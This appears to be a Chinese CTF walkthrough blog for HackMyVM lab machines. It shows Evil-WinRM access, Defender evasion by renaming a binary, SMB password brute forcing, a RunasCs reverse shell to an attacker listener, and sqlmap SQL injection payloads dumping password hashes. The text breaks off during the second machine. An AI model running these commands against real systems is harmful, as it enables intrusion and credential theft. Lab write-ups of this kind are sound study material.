*Evil-WinRM* PS C:\Users\nica\Documents> dir


    Directorio: C:\Users\nica\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/17/2026   2:18 AM          60858 winPEAS.ps1

*Evil-WinRM* PS C:\Users\nica\Documents> upload ../../../../../../home/kali/Desktop/tools/peass/winpeas/winPEAS.ps1


*Evil-WinRM* PS C:\Users\nica\Documents> rename-item winPEASx64.exe svchost.exe
.\svchost.exe
 
*Evil-WinRM* PS C:\Users\nica\Documents> cmd /c svchost.exe
 
cmd.exe : El sistema no puede ejecutar el programa especificado.
    + CategoryInfo          : NotSpecified: (El sistema no p...a especificado.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\nica\Documents> dir


    Directorio: C:\Users\nica\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/17/2026   2:18 AM          60858 winPEAS.ps1


*Evil-WinRM* PS C:\Users\nica\Documents>

Defender 开启 ✅
WinRM 环境 ✅
PEAS 全系被杀 ✅

没招了

枚举用户

*Evil-WinRM* PS C:\Users\nica\Documents> whoami /all

INFORMACIàN DE USUARIO
----------------------

Nombre de usuario    SID
==================== ==============================================
win-iurf14rbvgv\nica S-1-5-21-2519875556-2276787807-2868128514-1000


INFORMACIàN DE GRUPO
--------------------

Nombre de grupo                              Tipo           SID          Atributos
============================================ ============== ============ ========================================================================
Todos                                        Grupo conocido S-1-1-0      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios                             Alias          S-1-5-32-545 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios de administraci¢n remota    Alias          S-1-5-32-580 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\NETWORK                         Grupo conocido S-1-5-2      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados         Grupo conocido S-1-5-11     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa¤¡a                   Grupo conocido S-1-5-15     Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local                    Grupo conocido S-1-5-113    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci¢n NTLM              Grupo conocido S-1-5-64-10  Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta       S-1-16-8192


INFORMACIàN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripci¢n                                  Estado
============================= ============================================ ==========
SeChangeNotifyPrivilege       Omitir comprobaci¢n de recorrido             Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada

*Evil-WinRM* PS C:\Users\nica\Documents> net user

Cuentas de usuario de \\

-------------------------------------------------------------------------------
Administrador            akanksha                 DefaultAccount
Invitado                 nica                     WDAGUtilityAccount
El comando se ha completado con uno o m s errores.

得到新用户akanksha

尝试爆破

密码爆破

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# crackmapexec smb 192.168.0.102 -u akanksha -p ../tools/wordlists/kali/rockyou.txt

...
SMB         192.168.0.102   445    WIN-IURF14RBVGV  [+] WIN-IURF14RBVGV\akanksha:sweetgirl

得到了用户和密码

akanksha
sweetgirl

┌──(web)─(root㉿kali)-[/home/kali]
└─# evil-winrm -i 192.168.0.102 -u 'akanksha' -p 'sweetgirl'   

                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError                                                                
                                        
Error: Exiting with code 1

登不上去

提权

利用

需要使用 https://github.com/antonioCoco/RunasCs 这一工具来解决凭证不匹配的问题：

RunasCs 是一个实用程序，用于使用与用户当前登录使用显式凭据提供的权限不同的权限来运行特定进程。该工具是 Windows 内置 runas.exe 的改进开放版本，解决了一些限制：

允许显式凭据
如果从交互进程和服务进程中生成，则都可以工作
正确管理 Window Station 和 * 桌面的 *DACL 以创建新进程
使用更可靠的创建进程函数，例如 CreateProcessAsUser() 调用 CreateProcessWithTokenW() 进程是否拥有所需的权限（自动检测）
允许指定登录类型，例如 8-NetworkCleartext 登录（无 UAC 限制）
允许在已知管理员密码时绕过 UAC（标志 --bypass-uac）
允许创建一个进程，其主线程模拟请求的用户（标志 --remote-impersonation）
允许将 stdin、stdout 和 stderr 重定向到远程主机
它是开源的：

通过登录nica用户借助该工具反弹出akanksha的shell

RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444

 *Evil-WinRM* PS C:\Users\nica\Documents> upload Desktop/tools/RunasCs/RunasCs.exe
                                        
Info: Uploading /home/kali/Desktop/tools/RunasCs/RunasCs.exe to C:\Users\nica\Documents\RunasCs.exe                                                                       
                                        
Data: 1097728 bytes of 1097728 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\Users\nica\Documents> RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
The term 'RunasCs.exe' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (RunasCs.exe:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\nica\Documents> ls


    Directorio: C:\Users\nica\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/17/2026   3:06 AM         803118 RunasCs.exe
-a----        1/17/2026   2:18 AM          60858 winPEAS.ps1


*Evil-WinRM* PS C:\Users\nica\Documents> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
Program 'RunasCs.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\nica\Documents> upload Desktop/tools/RunasCs/RunasCs_net2.exe
                                        
Info: Uploading /home/kali/Desktop/tools/RunasCs/RunasCs_net2.exe to C:\Users\nica\Documents\RunasCs_net2.exe                                                             
                                        
Data: 1110696 bytes of 1110696 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica\Documents> ./RunasCs_net2.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
Program 'RunasCs_net2.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ ./RunasCs_net2.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./RunasCs_net2.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
*Evil-WinRM* PS C:\Users\nica\Documents>

没成功，换个1.4版本

*Evil-WinRM* PS C:\Users\nica\Documents> upload Desktop/tools/RunasCs/1.4/RunasCs.exe 
                                        
Info: Uploading /home/kali/Desktop/tools/RunasCs/1.4/RunasCs.exe to C:\Users\nica\Documents\RunasCs.exe                                                                   
                                        
Data: 1094312 bytes of 1094312 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica\Documents> ls


    Directorio: C:\Users\nica\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/17/2026   3:11 AM         800558 RunasCs.exe
-a----        1/17/2026   3:08 AM         812852 RunasCs_net2.exe
-a----        1/17/2026   2:18 AM          60858 winPEAS.ps1


*Evil-WinRM* PS C:\Users\nica\Documents> ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
Program 'RunasCs.exe' failed to run: The specified executable is not a valid application for this OS platform.At line:1 char:1
+ ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ ./RunasCs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

还是没成功，懒得重置了

┌──(root㉿kali)-[/home/kali/temp/Liar]
└─# evil-winrm -u nica -p 'hardcore'  -i 192.168.0.102
 
Evil-WinRM shell v3.5
 
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nica\Documents> cd ..
*Evil-WinRM* PS C:\Users\nica> upload runascs.exe
 
Info: Uploading /home/kali/temp/Liar/runascs14.exe to C:\Users\nica\runascs14.exe
 
Data: 65536 bytes of 65536 bytes copied
 
Info: Upload successful!
*Evil-WinRM* PS C:\Users\nica> .\runascs.exe akanksha sweetgirl cmd.exe -r 192.168.0.106:4444
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2abf34$\Default
[+] Async process 'cmd.exe' with pid 2936 created and left in background.

┌──(root㉿kali)-[/home/kali/temp/Liar]
└─# nc -lvnp 4444         
listening on [any] 4444 ...
connect to [172.20.10.8] from (UNKNOWN) [172.20.10.6] 49687
Microsoft Windows [Versi�n 10.0.17763.107]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
 
C:\Windows\system32>whoami /all
whoami /all
 
INFORMACI�N DE USUARIO
----------------------
 
Nombre de usuario        SID                                           
======================== ==============================================
win-iurf14rbvgv\akanksha S-1-5-21-2519875556-2276787807-2868128514-1001
 
INFORMACI�N DE GRUPO
--------------------
 
Nombre de grupo                              Tipo           SID                                            Atributos                                                               
============================================ ============== ============================================== ========================================================================
Todos                                        Grupo conocido S-1-1-0                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
WIN-IURF14RBVGV\Idministritirs               Alias          S-1-5-21-2519875556-2276787807-2868128514-1002 Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
BUILTIN\Usuarios                             Alias          S-1-5-32-545                                   Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\INTERACTIVE                     Grupo conocido S-1-5-4                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
INICIO DE SESI�N EN LA CONSOLA               Grupo conocido S-1-2-1                                        Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Usuarios autentificados         Grupo conocido S-1-5-11                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Esta compa��a                   Grupo conocido S-1-5-15                                       Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Cuenta local                    Grupo conocido S-1-5-113                                      Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
NT AUTHORITY\Autenticaci�n NTLM              Grupo conocido S-1-5-64-10                                    Grupo obligatorio, Habilitado de manera predeterminada, Grupo habilitado
Etiqueta obligatoria\Nivel obligatorio medio Etiqueta       S-1-16-8192                                                                                                            
 
INFORMACI�N DE PRIVILEGIOS
--------------------------
 
Nombre de privilegio          Descripci�n                                  Estado       
============================= ============================================ =============
SeChangeNotifyPrivilege       Omitir comprobaci�n de recorrido             Habilitada   
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
 
C:\Windows\system32>whoami
whoami
win-iurf14rbvgv\akanksha
 
C:\Windows\system32>cd \User
cd \User
El sistema no puede encontrar la ruta especificada.
 
C:\Windows\system32>cd ../../
cd ../../
 
C:\>dir
dir
 El volumen de la unidad C no tiene etiqueta.
 El n�mero de serie del volumen es: 26CD-AE41
 
 Directorio de C:\
 
26/09/2023  15:12    <DIR>          inetpub
15/09/2018  09:12    <DIR>          PerfLogs
15/09/2018  09:21    <DIR>          Program Files
15/09/2018  09:21    <DIR>          Program Files (x86)
26/09/2023  18:44    <DIR>          Users
14/04/2024  18:36    <DIR>          Windows
               0 archivos              0 bytes
               6 dirs  45.687.545.856 bytes libres
 
C:\>cd Users
cd Users
 
C:\Users>dir
dir
 El volumen de la unidad C no tiene etiqueta.
 El n�mero de serie del volumen es: 26CD-AE41
 
 Directorio de C:\Users
 
26/09/2023  18:44    <DIR>          .
26/09/2023  18:44    <DIR>          ..
26/09/2023  18:36    <DIR>          Administrador
26/09/2023  18:41    <DIR>          akanksha
14/04/2024  14:19    <DIR>          nica
26/09/2023  15:11    <DIR>          Public
               0 archivos              0 bytes
               6 dirs  45.687.545.856 bytes libres
 
C:\Users>cd akanksha
cd akanksha
 
C:\Users\akanksha>dir
dir
 El volumen de la unidad C no tiene etiqueta.
 El n�mero de serie del volumen es: 26CD-AE41
 
 Directorio de C:\Users\akanksha
 
26/09/2023  18:41    <DIR>          .
26/09/2023  18:41    <DIR>          ..
15/09/2018  09:12    <DIR>          Desktop
26/09/2023  18:41    <DIR>          Documents
15/09/2018  09:12    <DIR>          Downloads
15/09/2018  09:12    <DIR>          Favorites
15/09/2018  09:12    <DIR>          Links
15/09/2018  09:12    <DIR>          Music
15/09/2018  09:12    <DIR>          Pictures
15/09/2018  09:12    <DIR>          Saved Games
15/09/2018  09:12    <DIR>          Videos
               0 archivos              0 bytes
              11 dirs  45.687.545.856 bytes libres
 
C:\Users\akanksha>cd ../Administrador
cd ../Administrador
 
C:\Users\Administrador>dir
dir
 El volumen de la unidad C no tiene etiqueta.
 El n�mero de serie del volumen es: 26CD-AE41
 
 Directorio de C:\Users\Administrador
 
26/09/2023  18:36    <DIR>          .
26/09/2023  18:36    <DIR>          ..
26/09/2023  15:11    <DIR>          3D Objects
26/09/2023  15:11    <DIR>          Contacts
26/09/2023  15:11    <DIR>          Desktop
26/09/2023  15:11    <DIR>          Documents
26/09/2023  15:11    <DIR>          Downloads
26/09/2023  15:11    <DIR>          Favorites
26/09/2023  15:11    <DIR>          Links
26/09/2023  15:11    <DIR>          Music
26/09/2023  15:24            16.418 new.cfg
26/09/2023  15:11    <DIR>          Pictures
26/09/2023  18:36                13 root.txt
26/09/2023  15:11    <DIR>          Saved Games
26/09/2023  15:11    <DIR>          Searches
26/09/2023  15:11    <DIR>          Videos
               2 archivos         16.431 bytes
              14 dirs  45.687.545.856 bytes libres
 
C:\Users\Administrador>type root.txt
type root.txt
HMV1STWINDOWZ

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/liar/

HMV-Literal

呼啸山庄 — Thu, 15 Jan 2026 00:00:00 GMT

信息收集

ip定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.101   08:00:27:4c:64:e1       (Unknown)

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.101  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-15 05:12 EST
Nmap scan report for agencyperfect.com (192.168.0.101)
Host is up (0.00027s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 30:ca:55:94:68:33:8b:50:42:f4:c2:b5:13:99:66:fe (RSA)
|   256 2d:b0:5e:6b:96:bd:0b:e3:14:fb:e0:d0:58:84:50:85 (ECDSA)
|_  256 92:d9:2a:5d:6f:58:db:85:56:d6:0c:99:68:b8:59:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://blog.literal.hmv
Service Info: Host: blog.literal.hmv; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.40 seconds

80端口

发现ip重定向至blog.literal.hmv | 添加hosts

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u blog.literal.hmv   
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3.post1   
 (_||| _) (/_(_|| (_| )                  
                                         
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/reports/_blog.literal.hmv/_26-01-15_05-22-56.txt

Target: http://blog.literal.hmv/

[05:22:56] Starting:                     
[05:22:58] 403 -  281B  - /.htaccess.bak1
[05:22:58] 403 -  281B  - /.htaccessBAK
[05:22:58] 403 -  281B  - /.htaccess.save
[05:22:58] 403 -  281B  - /.htaccess.sample                                       
[05:22:59] 403 -  281B  - /.htaccess_extra                                        
[05:22:58] 403 -  281B  - /.ht_wsr.txt
[05:22:59] 403 -  281B  - /.htaccess_orig
[05:22:59] 403 -  281B  - /.htaccessOLD2
[05:22:59] 403 -  281B  - /.htm
[05:22:59] 403 -  281B  - /.html
[05:22:59] 403 -  281B  - /.htaccess_sc
[05:22:59] 403 -  281B  - /.htaccess.orig
[05:22:59] 403 -  281B  - /.htpasswd_test
[05:22:59] 403 -  281B  - /.htpasswds
[05:22:59] 403 -  281B  - /.htaccessOLD
[05:22:59] 403 -  281B  - /.httr-oauth
[05:23:00] 403 -  281B  - /.php
[05:23:21] 200 -    0B  - /config.php
[05:23:23] 302 -    0B  - /dashboard.php  ->  login.php
[05:23:29] 301 -  320B  - /fonts  ->  http://blog.literal.hmv/fonts/
[05:23:32] 301 -  321B  - /images  ->  http://blog.literal.hmv/images/
[05:23:32] 200 -  459B  - /images/
[05:23:37] 200 -  778B  - /login.php
[05:23:38] 302 -    0B  - /logout.php  ->  login.php
[05:23:52] 200 -  717B  - /register.php
[05:23:55] 403 -  281B  - /server-status/
[05:23:55] 403 -  281B  - /server-status

Task Completed

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.0.101 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 --exclude-length 310gobuster dir -u http://blog.literal.hmv -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 
Error: error on parsing arguments: invalid value for exclude-length: invalid string given: 310gobuster
                                         
┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://blog.literal.hmv -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 --exclude-length 310 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blog.literal.hmv
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          310
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,js,yaml,php,txt,html,zip,db
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 281]
/.php                 (Status: 403) [Size: 281]
/index.html           (Status: 200) [Size: 3325]
/images               (Status: 301) [Size: 321] [--> http://blog.literal.hmv/images/]                                      
/register.php         (Status: 200) [Size: 2159]
/login.php            (Status: 200) [Size: 1893]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/fonts                (Status: 301) [Size: 320] [--> http://blog.literal.hmv/fonts/]                                       
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
/.php                 (Status: 403) [Size: 281]
/.html                (Status: 403) [Size: 281]
/server-status        (Status: 403) [Size: 281]
Progress: 1985031 / 1985040 (100.00%)
===============================================================
Finished
===============================================================

/register

尝试注册admin失败

注册kali用户

/login

嗨呀，kali。这是我目前在做的一些项目，还有一些未来的想法。我把接下来要做的事儿都记在这儿了，搞不好都是些不值一提的玩意儿，或者说，是烂到家的东西 —— 好吧，反正就是不咋样的东西。不过呢，我是一个人单干，所以时间虽然宝贵，但也不算啥大问题，凡事慢慢来，稳着点就好。（顺便说一句，这个页面做得有点丑，我还在学习中呢）

看看我都在忙些什么项目

退出登录

POST /next_projects_to_do.php HTTP/1.1
Host: blog.literal.hmv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://blog.literal.hmv
Connection: keep-alive
Referer: http://blog.literal.hmv/next_projects_to_do.php
Cookie: PHPSESSID=l5gd282b80gmbbiggnqjcgfeuk
Upgrade-Insecure-Requests: 1
Priority: u=0, i 

sentence-query=123

尝试进行sqlmap：（慢如龟速，我直接拿wp的用了）

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch --dbs
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:04:49 /2025-06-08/

[12:04:49] [INFO] resuming back-end DBMS 'mysql' 
[12:04:49] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: sentence-query (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sentence-query=1' AND (SELECT 3428 FROM (SELECT(SLEEP(5)))hFKD) AND 'mdnY'='mdnY

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: sentence-query=1' UNION ALL SELECT NULL,CONCAT(0x717a6b7871,0x4b756f5a616d456b4c76596f48446652644149766b6d64745666776148746858744863505247566e,0x716b626a71),NULL,NULL,NULL-- -
---
[12:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[12:04:49] [INFO] fetching database names
available databases [4]:
[*] blog
[*] information_schema
[*] mysql
[*] performance_schema

[12:04:50] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/blog.literal.hmv'

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog --tables
-----
Database: blog
[2 tables]
+----------+
| projects |
| users    |
+----------+

┌──(kali㉿kali)-[~/temp/literal]
└─$ sqlmap -u "http://blog.literal.hmv/next_projects_to_do.php" --data "sentence-query=1" --cookie="PHPSESSID=1q4tie68cpa1mue9af2ao65549" --batch -D blog -T users --dump

Database: blog
Table: users
[18 entries]
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| userid | username  | useremail                        | userpassword                                                 | usercreatedate      |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+
| 1      | test      | test@blog.literal.htb            | $2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma | 2023-04-07 17:21:47 |
| 2      | admin     | admin@blog.literal.htb           | $2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K | 2023-04-07 17:21:47 |
| 3      | carlos    | carlos@blog.literal.htb          | $2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW | 2023-04-07 17:21:48 |
| 4      | freddy123 | freddy123@zeeli.moc              | $2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK | 2023-04-07 17:21:48 |
| 5      | jorg3_M   | jorg3_M@zeeli.moc                | $2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG | 2023-04-07 17:21:48 |
| 6      | aNdr3s1to | aNdr3s1to@puertonacional.ply     | $2y$10$F2Eh43xkXR/b0KaGFY5MsOwlnh4fuEZX3WNhT3PxSw.6bi/OBA6hm | 2023-04-07 17:21:48 |
| 7      | kitty     | kitty@estadodelarte.moc          | $2y$10$rXliRlBckobgE8mJTZ7oXOaZr4S2NSwqinbUGLcOfCWDra6v9bxcW | 2023-04-07 17:21:48 |
| 8      | walter    | walter@forumtesting.literal.hmv  | $2y$10$er9GaSRv1AwIwu9O.tlnnePNXnzDfP7LQMAUjW2Ca1td3p0Eve6TO | 2023-04-07 17:21:48 |
| 9      | estefy    | estefy@caselogic.moc             | $2y$10$hBB7HeTJYBAtdFn7Q4xzL.WT3EBMMZcuTJEAvUZrRe.9szCp19ZSa | 2023-04-07 17:21:48 |
| 10     | michael   | michael@without.you              | $2y$10$sCbKEWGgAUY6a2Y.DJp8qOIa250r4ia55RMrDqHoRYU3Y7pL2l8Km | 2023-04-07 17:21:48 |
| 11     | r1ch4rd   | r1ch4rd@forumtesting.literal.hmv | $2y$10$7itXOzOkjrAKk7Mp.5VN5.acKwGi1ziiGv8gzQEK7FOFLomxV0pkO | 2023-04-07 17:21:48 |
| 12     | fel1x     | fel1x@without.you                | $2y$10$o06afYsuN8yk0yoA.SwMzucLEavlbI8Rl43.S0tbxL.VVSbsCEI0m | 2023-04-07 17:21:48 |
| 13     | kelsey    | kelsey@without.you               | $2y$10$vxN98QmK39rwvVbfubgCWO9W2alVPH4Dp4Bk7DDMWRvfN995V4V6. | 2023-04-07 17:21:48 |
| 14     | jtx       | jtx@tiempoaltiempo.hy            | $2y$10$jN5dt8syJ5cVrlpotOXibeNC/jvW0bn3z6FetbVU/CeFtKwhdhslC | 2023-04-07 17:21:48 |
| 15     | DRphil    | DRphil@alcaldia-tol.gob          | $2y$10$rW58MSsVEaRqr8uIbUeEeuDrYB6nmg7fqGz90rHYHYMt2Qyflm1OC | 2023-04-07 17:21:48 |
| 16     | carm3N    | carm3N@estadodelarte.moc         | $2y$10$D7uF6dKbRfv8U/M/mUj0KujeFxtbj6mHCWT5SaMcug45u7lo/.RnW | 2023-04-07 17:21:48 |
| 17     | lanz      | lanz@literal.htb                 | $2y$10$PLGN5.jq70u3j5fKpR8R6.Zb70So/8IWLi4e69QqJrM8FZvAMf..e | 2023-04-07 17:55:36 |
| 18     | kali      | kali@kali.com                    | $2y$10$zzhgE4mDcdEGhDR6VGwK9.qpCDLnDkFmVB6cSDo.bPNjKdUV.Hw1. | 2025-06-08 15:40:11 |
+--------+-----------+----------------------------------+--------------------------------------------------------------+---------------------+

test:$2y$10$wWhvCz1pGsKm..jh/lChIOA7aJoZRAil40YKlGFiw6B.6a77WzNma
admin:$2y$10$fjNev2yv9Bi1IQWA6VOf9Owled5hExgUZNoj8gSmc7IdZjzuOWQ8K
carols:$2y$10$ikI1dN/A1lhkKLmiKl.cJOkLiSgPUPiaRoopeqvD/.p.bh0w.bJBW
freddy123:$2y$10$yaf9nZ6UJkf8103R8rMdtOUC.vyZUek4vXVPas3CPOb4EK8I6eAUK
jorg3_M:$2y$10$lZ./Zflz1EEFdYbWp7VUK.415Ni8q9kYk3LJ2nF0soRJG1RymtDzG
